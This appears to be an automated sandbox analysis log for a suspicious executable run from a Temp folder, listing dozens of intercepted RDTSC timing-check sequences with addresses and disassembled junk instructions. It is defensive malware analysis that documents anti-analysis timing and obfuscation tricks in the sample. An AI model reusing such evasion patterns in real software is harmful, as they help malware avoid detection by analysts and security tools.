                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 56B74B second address: 56B77A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C28D8B367h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F4C28D8B362h 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 56BA43 second address: 56BA47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 56BA47 second address: 56BA58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4C28D8B35Bh 0x0000000b rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 56BA58 second address: 56BA5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 56BA5F second address: 56BA81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007F4C28D8B356h 0x0000000f jmp 00007F4C28D8B363h 0x00000014 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 56EDD5 second address: 56EDDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 56EDDE second address: 56EDE6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 56EDE6 second address: 56EDF3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jo 00007F4C288D0386h 0x00000009 pop esi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 56E6A4 second address: 56E6A9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 56E6A9 second address: 56E6AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5CB72B second address: 5CB72F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5CBAE1 second address: 5CBAE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5CBAE7 second address: 5CBB35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4C28D8B364h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c jmp 00007F4C28D8B360h 0x00000011 pushad 0x00000012 jmp 00007F4C28D8B360h 0x00000017 jmp 00007F4C28D8B360h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5CBB35 second address: 5CBB53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 jg 00007F4C288D03B1h 0x0000000c jns 00007F4C288D0388h 0x00000012 push eax 0x00000013 push edx 0x00000014 jne 00007F4C288D0386h 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5CBE2C second address: 5CBE3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4C28D8B35Eh 0x00000009 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5D3F07 second address: 5D3F1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4C288D0393h 0x00000009 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5D7AE1 second address: 5D7AF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 ja 00007F4C288D0386h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5E3ECB second address: 5E3ED7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F4C28D8B356h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5E2896 second address: 5E289A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5E289A second address: 5E28A0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5E28A0 second address: 5E28A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5E28A6 second address: 5E28AB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5F1937 second address: 5F193D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5F193D second address: 5F1941 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5F1941 second address: 5F1964 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4C288D0399h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5F1964 second address: 5F19B0 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4C28D8B356h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jp 00007F4C28D8B360h 0x00000015 jc 00007F4C28D8B368h 0x0000001b jmp 00007F4C28D8B362h 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F4C28D8B361h 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 60C039 second address: 60C03F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 60AFCA second address: 60AFD6 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4C28D8B356h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 60AFD6 second address: 60AFE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4C288D038Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 60B3B3 second address: 60B3B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 60B3B7 second address: 60B3F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4C288D0397h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4C288D0390h 0x00000012 jmp 00007F4C288D038Ch 0x00000017 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 60B55A second address: 60B57C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F4C28D8B363h 0x0000000d jns 00007F4C28D8B356h 0x00000013 popad 0x00000014 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 60B57C second address: 60B581 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 60B81A second address: 60B82F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4C28D8B361h 0x00000009 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 60B82F second address: 60B833 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 60D6F6 second address: 60D70C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4C28D8B35Bh 0x00000010 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 60D70C second address: 60D712 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 61306F second address: 61307C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007F4C28D8B362h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 61307C second address: 613082 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 614A4C second address: 614A67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F4C28D8B366h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 614A67 second address: 614A71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 616A13 second address: 616A17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 50706BF second address: 50706D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C288D038Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov di, A516h 0x00000011 mov eax, edi 0x00000013 popad 0x00000014 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 50706D9 second address: 50706DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 50706DF second address: 50706E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 50706E3 second address: 5070701 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C28D8B362h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5070701 second address: 5070741 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4C288D0399h 0x0000000b popad 0x0000000c xchg eax, ebp 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushfd 0x00000011 jmp 00007F4C288D038Ah 0x00000016 sbb ax, 1AC8h 0x0000001b jmp 00007F4C288D038Bh 0x00000020 popfd 0x00000021 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5030D76 second address: 5030D7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5030D7A second address: 5030DC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F4C288D0396h 0x0000000c add esi, 35553C38h 0x00000012 jmp 00007F4C288D038Bh 0x00000017 popfd 0x00000018 popad 0x00000019 mov dword ptr [esp], ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F4C288D0390h 0x00000025 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5030DC1 second address: 5030DD0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C28D8B35Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5080800 second address: 5080806 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5080806 second address: 5080817 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4C28D8B35Dh 0x00000009 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 4FF0B25 second address: 4FF0B2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 4FF0B2B second address: 4FF0B57 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C28D8B35Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4C28D8B367h 0x00000011 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 4FF0B57 second address: 4FF0B5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 4FF0B5D second address: 4FF0B61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5030AC5 second address: 5030AD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C288D038Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5030AD3 second address: 5030B00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C28D8B35Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F4C28D8B366h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5030B00 second address: 5030B04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5030B04 second address: 5030B08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5030B08 second address: 5030B0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5030B0E second address: 5030B5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F4C28D8B365h 0x00000008 pop eax 0x00000009 mov cx, dx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F4C28D8B364h 0x00000019 or cx, CFC8h 0x0000001e jmp 00007F4C28D8B35Bh 0x00000023 popfd 0x00000024 mov ecx, 25ECA13Fh 0x00000029 popad 0x0000002a rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5030B5D second address: 5030BD5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4C288D038Bh 0x00000009 adc eax, 2BB2960Eh 0x0000000f jmp 00007F4C288D0399h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F4C288D0390h 0x0000001b or si, 8488h 0x00000020 jmp 00007F4C288D038Bh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 mov ebp, esp 0x0000002b jmp 00007F4C288D0396h 0x00000030 pop ebp 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 mov ebx, 3E08AB00h 0x00000039 mov bh, 77h 0x0000003b popad 0x0000003c rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5030BD5 second address: 5030BDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5020AE2 second address: 5020B21 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C288D0399h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F4C288D038Eh 0x0000000f push eax 0x00000010 jmp 00007F4C288D038Bh 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5020B21 second address: 5020B3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C28D8B367h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5020B3C second address: 5020B42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5020B42 second address: 5020B46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5020B46 second address: 5020B56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5020B56 second address: 5020B5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5020B5A second address: 5020B60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5020B60 second address: 5020B66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5070F43 second address: 5070F77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, bl 0x00000005 mov ah, B4h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esp 0x0000000b jmp 00007F4C288D0398h 0x00000010 mov dword ptr [esp], ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F4C288D038Ah 0x0000001c rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5070F77 second address: 5070F7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5070F7B second address: 5070F81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5070F81 second address: 5070F92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4C28D8B35Dh 0x00000009 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5070F92 second address: 5070F96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5070F96 second address: 5070FD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushfd 0x00000010 jmp 00007F4C28D8B364h 0x00000015 jmp 00007F4C28D8B365h 0x0000001a popfd 0x0000001b popad 0x0000001c rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5070E6F second address: 5070E75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5070E75 second address: 5070EC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C28D8B364h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov dx, cx 0x0000000e pushfd 0x0000000f jmp 00007F4C28D8B35Ah 0x00000014 jmp 00007F4C28D8B365h 0x00000019 popfd 0x0000001a popad 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F4C28D8B35Ch 0x00000023 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5070CF8 second address: 5070CFE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5070CFE second address: 5070D49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C28D8B35Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov ecx, edi 0x00000010 pushfd 0x00000011 jmp 00007F4C28D8B369h 0x00000016 add si, 7036h 0x0000001b jmp 00007F4C28D8B361h 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
